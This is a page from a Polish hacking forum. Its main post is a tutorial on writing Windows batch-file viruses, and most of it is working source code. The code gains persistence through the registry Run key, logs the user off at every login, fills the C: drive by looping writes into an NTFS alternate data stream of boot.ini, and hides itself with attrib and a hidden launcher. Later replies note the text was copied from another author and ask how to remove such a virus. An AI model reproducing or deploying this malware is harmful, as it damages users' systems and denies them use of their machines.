Rejestracja
•
Szukaj
•
FAQ
•
Użytkownicy
•
Grupy
•
Galerie
•
Zaloguj
Forum wszystko o hackingu i nie tylko Strona Główna
»
różne
Napisz odpowiedź
Użytkownik
Temat
Treść wiadomości
Emotikony
Więcej Ikon
Kolor:
Domyślny
Ciemnoczerwony
Czerwony
Pomarańćzowy
Brązowy
Żółty
Zielony
Oliwkowy
Błękitny
Niebieski
Ciemnoniebieski
Purpurowy
Fioletowy
Biały
Czarny
Rozmiar:
Minimalny
Mały
Normalny
Duży
Ogromny
Zamknij Tagi
Add image to post
Opcje
HTML:
NIE
BBCode
:
TAK
Uśmieszki:
TAK
Wyłącz BBCode w tym poście
Wyłącz Uśmieszki w tym poście
Kod potwierdzający: *
Wszystkie czasy w strefie EET (Europa)
Skocz do:
Wybierz forum
Uwaga
----------------
UWAGA!
Hacking
----------------
Różne
Exploity
Buffer Overflow
File Stream Pointer Overwrite
Bugtraq
Heap Overflow
Przechwytywanie informacji w sieciach LAN
SQL Injection
Gadu-Gadu
Phishing
XSS
DoS
Kursy Programowania
----------------
Assembler
PHP
C/C++
HTML
XHTML
Perl
Turbo Pascal
Download
----------------
Sniffery,Bindery,Keyloggery
Różne programy hakerskie
Skanery
Exploity
Reklama
----------------
Hackme.pl
Hacking.pl
Hackme 3.0 - GRA
Szkoła Hakerów
NiggaStyle
Master-warez.tk
Inter-line
Evilteam
Hemp Gru Team - Counter Strike 1.6 Clan
Bezpieczeństwo
----------------
Łaty
Bezpieczeństwo serwerów
Windows
Windows
----------------
przechowywanie haseł
triki hakerskie
różne
Linux
----------------
przechowywanie haseł
różne
Licznik
----------------
Licznik odwiedzin
Klikajcie!!!
Przegląd tematu
Przegląd tematu
Autor
Wiadomość
Zozew
Wysłany: Pią 15:54, 26 Lut 2010
Temat postu: bat
mam wlasnie virusa bat.agent143 , batch virus, jak się go pozbyć?delete nic nie daje, tylko windows nie chcial mi sie uruchomić, :/ może on jakieś szkody wyrządzić??
Iwan158
Wysłany: Sob 13:39, 08 Mar 2008
Temat postu:
zapomnialeś dopisać, że to nie twój artykuł... napisał go 'rust rabbit'
haker512
Wysłany: Pią 22:47, 09 Lut 2007
Temat postu: wirus bat
1. Wstępniak
Określenia
bat - plik wsadowy
run - klucz rejestru (-> punkt 2)
2. Autostart wirusa
Omówie tu tylko jeden ze sposobów, mianowicie rejestr.
Są dwa klucze, z którymi startują programy po zalogowaniu:
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
3. Jak sam bat może dodawać sie do rejestru???
Oto źródło:
--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo "wirek"="hideex.exe plik.bat">>reg.reg
regedit /s reg.reg
del reg.reg
--------------------------------------
Omówienie:
- tworzy plik reg.reg
- dodaje go do rejestry
- usuwa plik reg.reg
4. Co może nasz wirus???
Bawiąc sie batami zrobiłem 2 wirki:
1. po zalogowaniu wylogowywuje usera
--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo ""="logoff.exe">>reg.reg
regedit /s reg.reg
del reg.reg
--------------------------------------
Omówienie:
- dodaje do run plik logoff.exe
2. zapełnia dysk c:
--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo ""="%0">>reg.reg
regedit /s reg.reg
del reg.reg
cd c:
:go
type boot.ini>> boot.ini:str1
goto :go
--------------------------------------
Omówienie:
- dodaje sie do rejestru
- zapisuje plik boot.ini do strumienia, czyli partyca musi być w NTFSie:(
ale zamiast "type boot.ini>> boot.ini:str1" możemy "type boot.ini>> wirek.cus"
5. Ukrywanie bata
Ukrycie pliku na dysku
--------------------------------------
attrib +H +S %0
--------------------------------------
"Ukryty" start programu
Dodając wpis do rejestru musimy pamiętać, że jak wida zrestartujemy to po zalogowaniu
mignie okienko. Lepiej będzie jak damy jeszcze taki programek jak hideex.
Wtedy wpis w rejestrze (wyeksportowany) będzie wyglądał tak:
"wirek"="hideex.exe plik.bat"
przy założeniu, że bedą uruchamiane z c:\windows\system32.
Ja wole zamiast "wirek" zostawić "" bo wtedy w rejestrze bedzie to
zapisane jako "(Domyślna)".
6. Podsumowanie
Batwirusy mają duże możliwości i działanie wirusa zależy tylko i wyłącznie od zamiarów autora
fora.pl
- załóż własne forum dyskusyjne za darmo
Powered by
phpBB
© 2001, 2005 phpBB Group
Design by
Freestyle XL
/
Music Lyrics
.
Regulamin